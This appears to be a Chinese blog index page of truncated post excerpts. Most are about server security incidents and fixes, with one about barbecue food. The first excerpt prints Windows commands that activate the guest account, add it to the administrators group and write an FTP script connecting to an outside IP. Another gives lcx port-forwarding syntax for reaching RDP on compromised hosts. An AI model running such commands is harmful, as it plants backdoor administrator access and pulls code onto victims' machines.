net user guest 87966550 net localgroup administrators guest /add net user guest /active:yes echo open 219.128.253.142 >1.txt echo 123 >>1.txt echo 123... ...
分类:
其他好文 时间:
2018-06-16 17:00:27
阅读次数:
468
事件描述:阿里云报警 ——检测该异常事件意味着您服务器上开启了"Chargen/DNS/NTP/SNMP/SSDP"这些UDP端口服务,黑客通过向该ECS发送伪造源IP和源端口的恶意UDP查询包,迫使该ECS向受害者发起了UDP DDOS攻击 源IP: xx.xx.xx.xx 源PORT: 111 ...
分类:
其他好文 时间:
2018-06-05 11:37:16
阅读次数:
1168
烧烤架,钎子,优质碳。这个都是必须的 适宜烧烤的食物 比较常见的几类 肉类:香肠、羊肉、牛肉、鸡翅、各类鱼丸、虾丸、贡丸、墨鱼丸、羊腰、羊根筋、鸡脖、鸡胗、鸡柳、羊鞭等。 鱼虾:鱼(各类)、鱿鱼、墨鱼仔、虾、螺肉、干鱼片、蟹、带子、鲜贝。 蔬菜:玉米、红薯、蘑菇、土豆、青椒、萝卜、生菜、洋葱、西兰花 ...
分类:
其他好文 时间:
2018-04-09 14:48:38
阅读次数:
177
昨天去处理客户的服务器问题,win2000界面,估计有些新人没见过吧。05年时候多么熟悉的画面啊。。。。。提示ntldr丢失,引导修复一下,又启动起来了。。。估计成为人家的肉鸡已经有十年了,木马一堆,尽量不重装系统,虽然是义务劳动,但是也要搞好啊。
漏洞描述:memcache是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以开放在外网的memcache服务很容易被攻击者扫描发现,通过命令交互可直接读取memcache中的敏感信息。修复方案:因memcache无权限控制功能,所以需要用户对访问来源进行限制。方案一:如果memcache没有在外网开放的必要,可在memcached启动的时候指定绑定的ip地址为 127.0.0
分类:
系统相关 时间:
2018-03-10 16:38:32
阅读次数:
323
端口转发:第一条和第三配合使用。如在本机上监听 -listen 51 3389,在肉鸡上运行-slave 本机ip 51 肉鸡ip 3389那么在本地连127.0.1就可以连肉鸡的3389.第二条是本机转向。如-tran 51 127.0.0.1 3389 e:\\recycler\\lcx.exe ...
由于最近比特币被炒到近乎不可思议的价格,所以网络上的肉鸡都被黑产们一个个培养成了挖矿鸡。今儿就聊聊如何进行WebLogic10的反序列化漏洞的升级方法。
分类:
Web程序 时间:
2018-02-08 15:29:11
阅读次数:
418
一:问题定位 现象: 近期发现有几台openstack云主机被修改密码并被肉鸡。 黑客操作日志: 登陆方式不是通过暴力破解的方式进行登陆此机器,同时看日志看到登陆前有重启虚拟机的行为。 根据重启日志,应该是黑客通过某种方式重启 OpenStack 中的虚拟机,目前有以下几种方式 1.有权限登陆 Op ...
分类:
其他好文 时间:
2018-02-07 19:45:18
阅读次数:
177
一、C&C通信 这里的C&C服务器指的是Command & Control Server--命令和控制服务器,说白了就是被控主机的遥控端。一般C&C节点分为两种,C&C Server 和 C&C Client。Server就是就是黑客手里的遥控器。Client就是被控制的电脑,也就是受害者。C&C通 ...
分类:
其他好文 时间:
2018-02-04 13:57:18
阅读次数:
217
一、ssh安装 查看系统是否安装试试:rpm -qa | grep openssh,下图所示则为已安装。 若系统为安装ssh,则配置好yum开始安装ssh。 安装命令:yum install -y openssh-server openssh-clients 二、ssh修改安全连接端口 如使用默认的 ...
分类:
系统相关 时间:
2017-12-29 17:50:24
阅读次数:
209
